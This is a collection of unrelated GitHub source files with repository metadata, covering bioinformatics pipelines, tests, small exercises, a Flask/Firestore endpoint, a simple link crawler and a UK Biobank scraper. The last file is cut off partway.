Default: False\",\n action='store_true')\n parser.add_argument(\"--gff\", required=False,\n help=\"file with gff annotations for contigs. Default: none\",\n default=\"\")\n parser.add_argument(\"--panx_export\", required=False,\n help=\"whether to export panX output from pangraph. Default: False\",\n action=\"store_true\")\n parser.add_argument(\"--bandage\", required=False,\n help=\"whether to run Bandage on pangraph. Default: False\",\n action=\"store_true\")\n parser.add_argument(\"--snv_threshold\", required=False,\n help=\"Nucleotide-level difference threshold for focal gene (1 SNV = 1 diff, Xbp indel = X diffs). Default: 25\",\n default=\"25\")\n parser.add_argument(\"--gene_length_threshold\", required=False,\n help=\"Lateral coverage required of focal gene (0-1). Default: 0.99\",\n default=\"0.99\")\n parser.add_argument(\"--pangraph_polish\", required=False,\n help=\"whether to polish the pangraph. Default: False\",\n action=\"store_true\")\n parser.add_argument(\"--pangraph_aligner\", required=False,\n help=\"aligner to use for building pangraph. Default: minimap2\",\n default=\"minimap2\",\n choices=[\"minimap2\", \"mmseqs\"])\n parser.add_argument(\"--pangraph_seed\", required=False,\n help=\"random seed for pangraph (for reproducibility). Default: 0\",\n default=\"0\")\n parser.add_argument(\"--pangraph_alpha\", required=False,\n help=\"value of alpha parameter for pangraph. Default: 100\",\n default=\"100\")\n parser.add_argument(\"--pangraph_beta\", required=False,\n help=\"value of beta parameter for pangraph. Default: 10\",\n default=\"10\")\n parser.add_argument(\"--pangraph_dist_backend\", required=False,\n help=\"distance backend for calculation of pangraph. Default: native\",\n default=\"native\",\n choices=[\"native\", \"mash\"])\n parser.add_argument(\"--pangraph_minblocklength\", required=False,\n help=\"minimum block length for pangraph. Default: 100\",\n default=\"100\")\n parser.add_argument(\"--pangraph_edgeminlength\", required=False,\n help=\"minimum edge length for pangraph when exporting gfa. Default: 0\",\n default=\"0\")\n parser.add_argument(\"--breakpoint_minimap2\", required=False,\n help=\"whether to also calculate breakpoint distances using minimap2. 
Default: False\",\n action=\"store_true\")\n return parser.parse_args()\n\ndef run_snakemake_pipeline(config_file):\n snakemake_command = f\"snakemake --cores 1 --configfile {config_file} -r prepare_DB run_pangraph calculate_distances make_plots\"\n print(snakemake_command)\n subprocess.run(snakemake_command, shell=True)\n\ndefault_options = {\"version\":\"default\",\n \"focal_genes\": \"[]\",\n \"complete\": \"True\",\n \"version\" : \"default\",\n \"panx_export\": \"False\",\n \"bandage\": \"True\",\n \"snv_threshold\": \"25\",\n \"gene_length_threshold\": \"0.99\",\n \"region_upstream\": \"5000\",\n \"region_downstream\": \"5000\",\n \"pangraph_polish\": \"False\",\n \"pangraph_aligner\": \"minimap2\",\n \"pangraph_seed\":\"0\",\n \"pangraph_alpha\": \"100\",\n \"pangraph_beta\": \"10\",\n \"pangraph_dist_backend\": \"native\",\n \"pangraph_minblocklength\": \"100\",\n \"pangraph_edgeminlength\": \"0\",\n \"include_gff\": \"False\",\n \"output_dir\": \"output\",\n \"breakpoint_minimap2\":\"False\"}\nboolean_options = [\"complete\", \"panx_export\", \"pangraph_polish\",\n \"include_gff\", \"breakpoint_minimap2\", \"bandage\"]\n\n\ndef write_config_file(user_options, config_file):\n with open(config_file, 'w') as f:\n for key in default_options.keys():\n if key in user_options.keys():\n if key==\"focal_genes\":\n f.write(\"%s: [\\\"%s\\\"]\\n\" % (key, user_options[key]))\n elif key in boolean_options:\n f.write(\"%s: %s\\n\" % (key, user_options[key]))\n else:\n f.write(\"%s: \\\"%s\\\"\\n\" % (key, user_options[key]))\n else:\n if key in boolean_options:\n f.write(\"%s: %s\\n\" % (key, default_options[key]))\n else:\n f.write(\"%s: \\\"%s\\\"\\n\" % (key, default_options[key]))\n\n\ndef rewrite_gene_fasta(gene_fasta, new_prefix, new_fasta):\n with open(gene_fasta, 'r') as f:\n gene_fasta_string = f.read()\n if gene_fasta_string.count(\">\")>1:\n print(\"Warning: gene fasta \"+gene_fasta+\" seems to have more than one fasta header\")\n sys.exit(1)\n elif gene_fasta_string.count(\">\")==1:\n re.sub(\">\", \">\"+new_prefix+\" \", gene_fasta_string)\n with open(new_fasta, \"w\") as f:\n f.write(gene_fasta_string)\n\nif __name__ == \"__main__\":\n\n # Parse command line arguments\n args = get_options()\n\n user_options = {\"output_dir\": args.output_dir, \n \"focal_genes\": args.focal_gene_name,\n \"panx_export\": args.panx_export,\n \"bandage\": args.bandage,\n \"snv_threshold\": args.snv_threshold,\n \"gene_length_threshold\": args.gene_length_threshold,\n \"region_upstream\": args.flanking_region, \n \"region_downstream\": args.flanking_region,\n \"pangraph_polish\": args.pangraph_polish,\n \"pangraph_aligner\": args.pangraph_aligner,\n \"pangraph_seed\":args.pangraph_seed,\n \"pangraph_alpha\":args.pangraph_alpha,\n \"pangraph_beta\": args.pangraph_beta,\n \"pangraph_dist_backend\": args.pangraph_dist_backend,\n \"pangraph_minblocklength\": args.pangraph_minblocklength,\n \"pangraph_edgeminlength\": args.pangraph_edgeminlength,\n \"breakpoint_minimap2\": args.breakpoint_minimap2}\n if not os.path.exists(args.output_dir):\n print(\"Making output dir: \", args.output_dir)\n os.makedirs(args.output_dir)\n\n if os.path.exists(args.output_dir+\"/\"+args.focal_gene_name):\n print(\"Warning: output directory \"+args.output_dir+\"/\"+args.focal_gene_name+\" exists.\")\n print(\"If you encounter snakemake errors, rerun the snakemake command below and add --unlock.\")\n if args.force:\n print(\"You used --force! 
Removing previous results and rerunning pipeline.\")\n shutil.rmtree(args.output_dir+\"/\"+args.focal_gene_name)\n\n if not os.path.exists(\"configs\"):\n os.makedirs(\"configs\")\n config_file = \"configs/\"+\"config_\"+args.focal_gene_name+\".yaml\"\n\n # copy files into input directory if needed \n # (wasteful, but because of how I've written snakemake pipeline to function with multiple genes)\n if not os.path.exists(\"input\"):\n os.makedirs(\"input\")\n for subdir in [\"gffs\", \"contigs\", \"focal_genes\"]:\n if not os.path.exists(\"input/\"+subdir):\n os.makedirs(\"input/\"+subdir)\n contigs_file = \"input/contigs/\"+args.focal_gene_name+\"_contigs.fa\"\n gene_file = \"input/focal_genes/\"+args.focal_gene_name+\".fa\"\n\n if args.gff!=\"\":\n user_options[\"include_gff\"] = \"True\"\n gff_file = \"input/gffs/\"+args.focal_gene_name+\"_annotations.gff\"\n if args.gff==gff_file:\n pass\n else:\n shutil.copy(args.gff, gff_file)\n\n if args.contigs==contigs_file:\n pass\n else:\n shutil.copy(args.contigs, contigs_file)\n\n if args.gene_fasta==gene_file:\n with open(args.gene_fasta, \"r\") as f:\n header = f.readline().split(\" \")[0][1:]\n if header!=args.focal_gene_name:\n print(\"Warning: your focal gene fasta does not have the same name as the focal gene. Please amend.\")\n sys.exit(1)\n else:\n rewrite_gene_fasta(args.gene_fasta, args.focal_gene_name, gene_file)\n \n # Write the config file\n write_config_file(user_options, config_file)\n\n # Call the Snakemake pipeline\n run_snakemake_pipeline(config_file)\n","repo_name":"liampshaw/mobile-gene-regions","sub_path":"analyze-flanking-regions.py","file_name":"analyze-flanking-regions.py","file_ext":"py","file_size_in_byte":9914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"2941373643","text":"from lib.solutions.SUM import sum_solution\nimport pytest\n\n\nclass TestSum():\n def test_sum(self):\n \"\"\"\n GIVEN the sum_two_numbers method\n WHEN two positive numbers between 0 and 100 are passed\n THEN the output is the sum of those two numbers\n \"\"\"\n assert sum_solution.compute(1, 2) == 3\n\n def test_sum_raises_exception(self):\n \"\"\"\n GIVEN the sum_two_numbers method\n WHEN one of the input numbers is outside the 0-100 range\n THEN a ValueError exception is raised\n \"\"\"\n\n with pytest.raises(ValueError) as e:\n res = sum_solution.compute(195, 2)\n\n assert \"num1 must be in the range 0-100\" in str(e)\n\n with pytest.raises(ValueError) as e:\n res = sum_solution.compute(2, -100)\n \n assert \"num2 must be in the range 0-100\" in str(e)\n","repo_name":"DPNT-Sourcecode/CHK-jqmj01","sub_path":"test/solution_tests/SUM/test_sum.py","file_name":"test_sum.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2180781519","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\nimport logging\n\n\nclass LoadFactOperator(BaseOperator):\n '''\n This operator loads fact tables into Amazon Redshift\n Parameters\n ----------\n redshift_conn_id : str\n Amazon Redshift RDB credentials\n \n table : str\n Table name which data will be inserted into\n \n sql : str\n The sql query used to insert data into the fact table\n '''\n\n\n ui_color = '#F98866'\n\n @apply_defaults\n def __init__(self,\n # Define your operators params (with defaults) here\n # Example:\n # conn_id = 
your-connection-name\n                 redshift_conn_id=\"\",\n                 table=\"\",\n                 sql=\"\",\n                 *args, **kwargs):\n\n        super(LoadFactOperator, self).__init__(*args, **kwargs)\n        # Map params here\n        # Example:\n        # self.conn_id = conn_id\n        self.redshift_conn_id = redshift_conn_id\n        self.table = table\n        self.sql = sql\n\n    def execute(self, context):\n        # connect to Amazon Redshift\n        redshift_hook = PostgresHook(self.redshift_conn_id)\n        self.log.info(f'Loading data into {self.table} fact table...')\n        \n        # Execute the insertion query on Redshift hook\n        redshift_hook.run(f\"INSERT INTO {self.table} {self.sql}\")\n        self.log.info(f\"LoadFactOperator implemented: Data inserted into {self.table} in Redshift\")\n","repo_name":"Sampsonyu/Data_Pipeline_with_Airflow","sub_path":"plugins/operators/load_fact.py","file_name":"load_fact.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"25312295870","text":"# 1. Write a recursive function that computes the sum of all elements of nested lists (any depth).\n# Example list (Python syntax): [1, 2, [2, 4, [[7, 8], 4, 6]]]; the sum of the elements is 34\n\n\ndef sum_all(l):\n    total = 0\n    for i in l:\n        if (type(i) == type([])):\n            total = total + sum_all(i)\n        else:\n            total = total + i\n    return total\nprint(\"sum of elements -\", sum_all([1, 2, [2, 4, [[7, 8], 4, 6]]]))\n\n\n# 2. Write a recursive function that computes the first n Fibonacci numbers.\n# Example calls: \n# fib(5) -> 0,1,1,2,3\n# fib(10) -> 0,1,1,2,3,5,8,13,21,34\n\ndef fib(n):\n    def fib_num(n):\n        if n <= 1:\n            return n \n        else:\n            return fib_num(n-1) + fib_num(n-2)\n    return ','.join([str(fib_num(i)) for i in range(n)])\n\nprint(fib(5))\nprint(fib(10))","repo_name":"MikitaTsiarentsyeu/Md-PT1-52-22","sub_path":"Tasks/Drobyshev/Task7/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"71911210711","text":"import argparse\nimport os\nfrom pdb import set_trace as bp\n\nimport torch\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\n# my lib\nimport data_loader.data_loaders as module_data\nimport model.model as module_arch\nfrom parse_config import ConfigParser\nfrom utils import to_device\nfrom constant import target_indices\n\n\ndef main(config, output_type='top3_indices', output_dir='./submission.csv'):\n    logger = config.get_logger('test')\n\n    # setup data_loader instances\n    config['data_loader']['args']['validation_split'] = False\n    config['data_loader']['args']['training'] = False\n    # config['data_loader']['args']['batch_size'] = 512\n    config['data_loader']['args']['num_workers'] = 2\n\n    data_loader = getattr(module_data, config['data_loader']['type'])(\n        **config['data_loader']['args'],\n    )\n\n    # build model architecture\n    model = config.init_obj('arch', module_arch)\n    logger.info(model)\n    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n    logger.info('Loading checkpoint: {} ...'.format(config.resume))\n    checkpoint = torch.load(config.resume, map_location=device)\n    state_dict = checkpoint['state_dict']\n    if config['n_gpu'] > 1:\n        model = torch.nn.DataParallel(model)\n    model.load_state_dict(state_dict)\n\n    # prepare model for testing\n    model = model.to(device)\n    model.eval()\n\n    outputs_logits = []\n    outputs_top3 = []\n    chids = []\n    with torch.no_grad():\n        for i, (data, chid) in enumerate(tqdm(data_loader)):\n            output = model(to_device(data, device))\n            if 
len(output.size()) >= 3:\n output = output[:, -1]\n\n output = output[:, target_indices]\n _, output_topk_indices = torch.topk(output, 3, dim=1)\n\n chids.append(chid.cpu().detach().numpy())\n outputs_logits.append(output.cpu().detach().numpy())\n outputs_top3.append(target_indices[output_topk_indices.cpu().detach().numpy().astype(int)]+1)\n\n chids = np.concatenate(chids, axis=0).reshape(-1, 1).astype(int)\n outputs_logits = np.concatenate(outputs_logits, axis=0).astype(float)\n outputs_top3 = np.concatenate(outputs_top3, axis=0).astype(int)\n # bp()\n pd.DataFrame(\n data=np.concatenate([chids, outputs_top3], axis=1),\n columns=['chid', 'top1', 'top2', 'top3']).astype(str).to_csv(f'{output_dir}/outputs_top3.csv', index=None)\n pd.DataFrame(\n data=np.concatenate([chids, outputs_logits], axis=1),\n columns=['chid']+list(range(16))).astype(str).to_csv(f'{output_dir}/outputs_logits.csv', index=None)\n \n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n args.add_argument('-t', '--output_type', type=str, default='top3_indices', choices=['top3_indices', 'logits'])\n args.add_argument('-o', '--output_dir', default='./submission.csv', type=str,\n help='output_dir')\n\n\n config = ConfigParser.from_args(args, test=True)\n args = args.parse_args()\n\n output_type = args.output_type\n output_dir = args.output_dir\n main(config, output_type, output_dir)\n","repo_name":"AxotZero/esun_consumption_prediction_1st_place_solution","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3522,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"5"} +{"seq_id":"4516438491","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'encryption' function below.\n#\n# The function is expected to return a STRING.\n# The function accepts STRING s as parameter.\n#\n\ndef encryption(s):\n cols = math.ceil(math.sqrt(len(s)))\n grid = [''] * cols\n col = 0\n for i in range(len(s)):\n grid[col] += s[i]\n col += 1\n if col == cols:\n col = 0\n return ' '.join(grid)\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = encryption(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"ThomasJRooney/practice","sub_path":"hackerrank/algorithms/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"266641988","text":"#!/usr/bin/env python\n\nimport requests\nimport re\nimport urllib.parse as urlparse # if wanting to use python 2 only import urlparse\n\ntarget_url = \"http://10.0.2.5/mutillidae/\"\ntarget_links = []\n\n\ndef extract_links_from(url):\n response = requests.get(url) # submits get request and extracts it\n return re.findall('(?:href=\")(.*?)\"', response.content.decode(errors=\"ignore\")) # regex searches html for a tags and returns it\n\n\ndef crawl(url):\n href_links = extract_links_from(url)\n for link in href_links:\n link = urlparse.urljoin(url, link)\n\n if \"#\" in link:\n link = link.split(\"#\")[0]\n\n if 
target_url in link and link not in target_links:\n target_links.append(link)\n print(link)\n crawl(link) # calls itself making it a recursive method\n\n\ncrawl(target_url)\n","repo_name":"azkrebs/python_for_ethical_hacking_2021","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"71892566873","text":"from django.test import TestCase\nfrom Hotel_app.models import *\n\nclass TestModels(TestCase):\n\n def testcreate(self):\n self.reservacionprueba = tblreservacion.objects.create(\n \n nombre = 'José',\n apellido = 'Perez',\n\n fecha_llegada = '2023-02-15',\n fecha_salida = '2022-02-20',\n email = 'josseperez@gmail.com',\n\n habitacion = 'Deluxe Double Room'\n\n\n )\n","repo_name":"HaroldSantos10/Web_Hotel","sub_path":"HotelVenv/Hotel_app/test/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"70811771671","text":"import time\r\nfrom scheduler import *\r\nfrom task1 import *\r\nfrom task2 import *\r\nfrom task3 import *\r\nfrom task4 import *\r\nfrom task5 import *\r\n\r\nscheduler = Scheduler()\r\nscheduler.SCH_Init()\r\n\r\ntask_Ready = [False, False, False, False]\r\ntask_Data = [\"\", \"\", \"\", \"\"]\r\n\r\ncamera = Camera()\r\n\r\ntask1 = StudentCardDetector(0, task_Ready, task_Data, camera)\r\ntask2 = FaceRecognizer(1, task_Ready, task_Data, camera)\r\ntask3 = StudentIDChecker(2, task_Ready, task_Data)\r\ntask4 = BusRecorder(3, task_Ready, task_Data)\r\ntask5 = AdafruitServer(latest_output)\r\n\r\nscheduler.SCH_Add_Task(task5.Run, 1000,500)\r\nscheduler.SCH_Add_Task(task1.RunTask, 1000,5000)\r\nscheduler.SCH_Add_Task(task2.RunTask, 2000,1000)\r\nscheduler.SCH_Add_Task(task3.RunTask, 3000,1000)\r\nscheduler.SCH_Add_Task(task4.RunTask, 4000,1000)\r\n\r\n# Run the first task\r\ntask_Ready[0] = True\r\n\r\nwhile True:\r\n scheduler.SCH_Update()\r\n scheduler.SCH_Dispatch_Tasks()\r\n time.sleep(0.1)\r\n","repo_name":"xiinthanh/IntroToCS_Project_","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28965980296","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 10 15:17:40 2015\n\n@author: ZSHU\n\"\"\"\n\n'''\ntypical recursive algorithm\n'''\n\n\nclass Solution(object):\n def combine(self, n, k):\n \"\"\"\n :type n: int\n :type k: int\n :rtype: List[List[int]]\n \"\"\"\n \n def combine(length, vector, temp, res):\n if len(temp)==length:\n res.append(temp)\n return \n elif len(vector)==0:\n return \n else:\n for i in range(len(vector)):\n combine(length, vector[i+1:], temp+[vector[i]], res)\n \n res=[]; vector=range(1, n+1)\n combine(k, vector, [], res )\n return res \n\n ","repo_name":"shuzhancnjx/leetcode-","sub_path":"Programming-Algorithm/Combinations.py","file_name":"Combinations.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28114684156","text":"#FIRESTORE Cloud data being sent through flask server to LocalHost! 
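(reads the 'entities' collection: a request with ?pm25=<doc-id>&DateTime=<doc-id> returns those two documents, otherwise every document in the collection is returned)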
\n##Using Query 'GET'\n\nimport os\n\nfrom firebase_admin import credentials, firestore, initialize_app\n\nfrom flask import Flask, request, jsonify\napp = Flask(__name__)\n\ncred = credentials.Certificate('serviceAccountKey.json')\n\ndefault_app = initialize_app(cred)\n\ndb = firestore.client()\n\ndatabase_ref = db.collection('entities')\n\n@app.route('/', methods=['GET'])\n\ndef read():\n\n    try:\n        pm25 = request.args.get('pm25')\n        dt = request.args.get('DateTime')\n        if pm25 and dt:\n            # fetch document snapshots and convert them to dicts so they are JSON-serializable\n            pm25_data = database_ref.document(pm25).get().to_dict()\n            dt_data = database_ref.document(dt).get().to_dict()\n            \n            return jsonify({'DateTime': dt_data, 'PM2.5': pm25_data}), 200\n        else:\n\n            all_todos = [doc.to_dict() for doc in database_ref.stream()]\n\n            return jsonify(all_todos), 200\n        \n        \n    except Exception as e:\n\n        return f\"An Error Occurred: {e}\"\n\nif __name__ == '__main__':\n\n    app.run(port = 4010, debug = True)\n","repo_name":"Shaxpy/Firebase-and-Cloud","sub_path":"Flask/Flask Server hosting Cloud.py","file_name":"Flask Server hosting Cloud.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"22144759181","text":"#12Spanishword\r\n#Write a function 'createDictionary' that creates a 'spanish' dictionary by assigning the Spanish equivalent of 1 to 10, like spanish['one']='uno'. Now print the values on the screen. (Mandatory)\r\n\r\ndef createDictionary(dict1):\r\n    while True:\r\n        spanish=input('Enter Spanish Number that you want to add in Dictionary: ')\r\n        if spanish in ['exit','Exit','EXIT']:\r\n            break\r\n        else:\r\n            english=input('Enter English for {}: '.format(spanish))\r\n            dict1[spanish]=english\r\n\r\n\r\ndicti={}\r\ncreateDictionary(dicti)\r\nprint(dicti)","repo_name":"LutiM30/My-Python-Work","sub_path":"dict13.py","file_name":"dict13.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20128458925","text":"def power(a,b):\r\n\tif b==0:\r\n\t\treturn 1\r\n\telif a==0:\r\n\t\treturn 0\r\n\telif b==1:\r\n\t\treturn a\r\n\telse:\r\n\t\treturn a*power(a,b-1)\r\n\t\t\r\n# \t\t3*power(3,3)\r\n# \t\t3*3*power(3,2)\r\n# 3*3*3*power(3,1)\r\n# if 1 return a\r\n# 3*3*3*3*power(3,0)\r\n# if 0 return 1\r\n# 3*3*3*3*1\r\n \r\nprint(power(3,4))\r\n","repo_name":"suprajaarthi/DSA","sub_path":"16 Day6 ExponentRec.py","file_name":"16 Day6 ExponentRec.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4188589449","text":"continua = str()\nlista = []\nwhile continua != 'n':\n    try:\n        lista += [int(input('Digite um número inteiro: '))]\n    except ValueError:\n        print('Digite apenas números inteiros!')\n        continue\n    while True:\n        continua = str(input('Deseja continuar? 
(S/N): ')).lower()\n if continua not in 'sn':\n print('Digite uma Opção Válida!')\n continue\n else:\n break\nprint(f'Você digitou os números:', end=' ')\nprint(str(lista)[1:-1])\nprint(f'Os números pares que você digitou foram:', end=' ')\nprint(str(list(filter(lambda x: x % 2 == 0, lista)))[1:-1])\nprint(f'Os números ímpares que você digitou foram:', end=' ')\nprint(str(list(filter(lambda x: x % 2 == 1, lista)))[1:-1])\n","repo_name":"JamesIslan/exercicios-python","sub_path":"curso-em-video-python/82.py","file_name":"82.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"8412220229","text":"# set the number of channels to be more than 2\nfrom struct import pack\nfrom math import pi, sin\nimport wave\nfs = 16000\nwf = wave.open('3channels.wav','w')\n#3 channels\nwf.setnchannels(3)\n#32 bits per sample - 4 bytes\nwf.setsampwidth(4)\n#sampling frequency I choosed is 16000Hz\nwf.setframerate(fs)\n#32 bits - 0~1\nmaxAmp = 2**31 - 1.0\nf1 = 200\nf2 = 400\nf3 = 800\nfor n in range(0, int(0.5*fs)):\n#'B'-unsigned 8-bit wav and it standard size is 1\n#first channel\n\tbinary_string = pack('i', maxAmp*sin(n*2*pi*f1/fs))\n#second channel\n\tbinary_string += pack('i', maxAmp*sin(n*2*pi*f2/fs))\n#third channel\n\tbinary_string += pack('i', maxAmp*sin(n*2*pi*f3/fs))\n\twf.writeframesraw(binary_string)\nwf.close()","repo_name":"Raisony/Dsp-lab","sub_path":"lecture_01_exercises/8/3channels.py","file_name":"3channels.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"618706493","text":"import sys\ninput = sys.stdin.readline\nINF = int(1e9)\n\n\ndef bellman_ford():\n global check\n distance = [INF] * (n+1)\n for a in range(1, n+1):\n for b in range(1, n+1):\n for node, dist in edges[b]:\n cost = distance[b] + dist\n if cost < distance[node]:\n distance[node] = cost\n if a == n:\n check = False\n return\n\n\nt = int(input())\n\nanswers = []\nfor _ in range(t):\n n, m, w = map(int, input().split())\n edges = [[] for _ in range(n+1)]\n\n for _ in range(m):\n s, e, t = map(int, input().split())\n edges[s].append([e, t])\n edges[e].append([s, t])\n\n for _ in range(w):\n s, e, t = map(int, input().split())\n edges[s].append([e, -t])\n\n print(edges)\n check = True\n bellman_ford()\n\n if check:\n answers.append(\"NO\")\n else:\n answers.append(\"YES\")\n\nfor answer in answers:\n print(answer)","repo_name":"Chockchockhancookie/Algorithm","sub_path":"꼭 다시 풀어볼 문제/1865.py","file_name":"1865.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12527648538","text":"# bank account - kind of account - methods - return new balance\n\n# Write a BankAccount class.\n# Bank accounts should be created with the kind of account (like \"savings\" or \"checking\").\n # Each account should keep track of its current balance.\n # Each account should have access to a deposit and a withdraw method.\n# Each account should start with a balance set to zero.\n# return the amount withdrawn, for convenience\n\nclass BankAccount():\n def __init__(self, kind, pin):\n self.kind = kind\n self.balance = 0\n self.fees = 0\n self.pin = pin\n\n def deposit(self, amount):\n self.balance += amount\n\n def withdraw(self, amount, pin_from_user):\n\n if (self.pin == pin_from_user):\n\n if (self.balance < amount):\n print(\"sorry yr too broke\")\n 
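# insufficient funds: bail out without touching the balance\n                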
return\n elif (self.balance == amount):\n self.balance -= amount\n print(f\"yr at zero, be careful\")\n else:\n self.balance -= amount\n print(f\"current balance is {self.balance}\")\n else:\n print(\"the pin you have entered is incorrect\")\n\n def change_pin(self, pin):\n self.pin = pin\n print(f\"your new pin is {self.pin}\")\n\n\n\n\nhan_bank = BankAccount(\"checking\", 69)\nprint(\"my new account is a {} account\".format(han_bank.kind))\n\nhan_bank.deposit(69000)\nprint(\"my current balance is ${}\".format(han_bank.balance))\n\nhan_bank.withdraw(690000, 698)\nprint(\"my current balance is ${}\".format(han_bank.balance))\n\nhan_bank.change_pin(6978)\n\n","repo_name":"iwasnevergivenaname/intro_to_py","sub_path":"bank_account.py","file_name":"bank_account.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36040376516","text":"import os\nimport errno\nimport numpy as np \nimport pandas as pd\nimport bs4 as bs\nfrom urllib.request import urlopen\nimport unicodedata\nfrom collections import OrderedDict\nimport argparse\n# ===================================================================================================================================\n# RAW DATA FILES\ninput_tab_file = '/path/to/ukb.tab'\nhesin='/path/to/hesin.txt'\nhesin_diag='/path/to/hesin_diag.txt'\ncoding_19_file='/path/to/coding19.tsv'\nexclusion_threshold = 50 # Skip categorical feature if has more than \"exclusion_threshold\" categories\n# ===================================================================================================================================\n\n# CREATE OUTPUT DIRECTORY\noutput_dir = 'Output'\ntry:\n os.makedirs(output_dir)\nexcept OSError as e:\n if e.errno != errno.EEXIST:\n raise\n# ===================================================================================================================================\n# SCRAPE UK BIOBANK SHOWCASE TO GET DATA-TYPE FOR EACH FIELD-ID\nprint('Scraping showcase webpage...')\nsauce = urlopen('http://biobank.ctsu.ox.ac.uk/crystal/list.cgi').read()\nsoup = bs.BeautifulSoup(sauce, 'lxml')\n\nfield_listing = ['Integer',\n 'Categorical (single)',\n 'Categorical (multiple)',\n 'Continuous',\n 'Text',\n 'Date',\n 'Time',\n 'Compound']\n\ndf_descriptions = []\n\nfor url in soup.find_all('a'):\n if url.text in field_listing:\n df_type = url.text\n link = 'http://biobank.ctsu.ox.ac.uk/crystal/' + url.get('href')\n sauce_loop = urlopen(link).read()\n soup_loop = bs.BeautifulSoup(sauce_loop, 'lxml')\n raw_text = unicodedata.normalize(\"NFKD\", soup_loop.get_text('\\t'))\n lines = raw_text.split('\\n')\n for line in lines:\n splt = [s for s in line.split('\\t')[1:] if s != ''\n and s != ' '\n and s!= ' '\n and s!= u'\\u2020']\n #u'\\u2020' is the dagger from Compound\n if len(splt) == 3 and splt[0].isdigit():\n splt.append(df_type)\n df_descriptions.append('%s\\t%s\\t%s\\t%s'%(splt[0],\n splt[1],\n splt[2],\n splt[3]))\n\nwith open('ukbdatafields.webscraped.tsv', 'w') as outfile:\n outfile.write('%s\\n'%('\\t'.join(['FieldID', 'Description', 'Category', 'ValueType'])))\n for f in df_descriptions:\n outfile.write('%s\\n'%f)\n\n# ===================================================================================================================================\n# CREATE A LIST OF FIELD ID'S FOR EACH DATA-TYPE\nprint('Creating a list of field-ids for each data-type...')\ndata_types = ['Categorical_multiple', 'Categorical_single', 'Continuous', 'Integer']\nfor 
t in data_types:\n outfile = open('%s/%s.datafields'%(output_dir, t), 'w')\n with open('%s/ukbdatafields.webscraped.tsv'%output_dir, 'r') as infile:\n for line in infile:\n fid, name, category, vartype = line.rstrip().split('\\t')\n # Vartype: replace brackets with an underscore\n if vartype.replace(' (', '_').replace(')','') == t:\n outfile.write('%s\\n'%fid)\n outfile.close()\n\n# ===================================================================================================================================\n# SPLIT TAB_FILE BY VALUE TYPE\nprint('Splitting .tab file by variable type...')\nfieldID_lists = [f for f in os.listdir(output_dir) if '.datafields' in f]\nfor fidlist in fieldID_lists:\n outprefix = fidlist.split('.')[0]\n #print('%s...'%(outprefix))\n\n tabfile = input_tab_file\n # GET COLUMN HEADER\n with open(tabfile, 'r') as infile:\n header = next(infile).split('\\t')\n\n def getCols(datafields):\n cols = []\n for df in datafields:\n # Look into why you only include first visit.\n # Extract features for all visits, but make sure this doesn't break anything. \n cols += [i for i,h in enumerate(header) if 'f.%s.0.'%df in h]\n return cols\n\n # UKB data-fields to search for\n with open('%s/%s'%(output_dir, fidlist), 'r') as infile:\n datafields = [line.rstrip() for line in infile]\n\n cols = getCols(datafields)\n\n with open(tabfile, 'r') as infile:\n outfile = 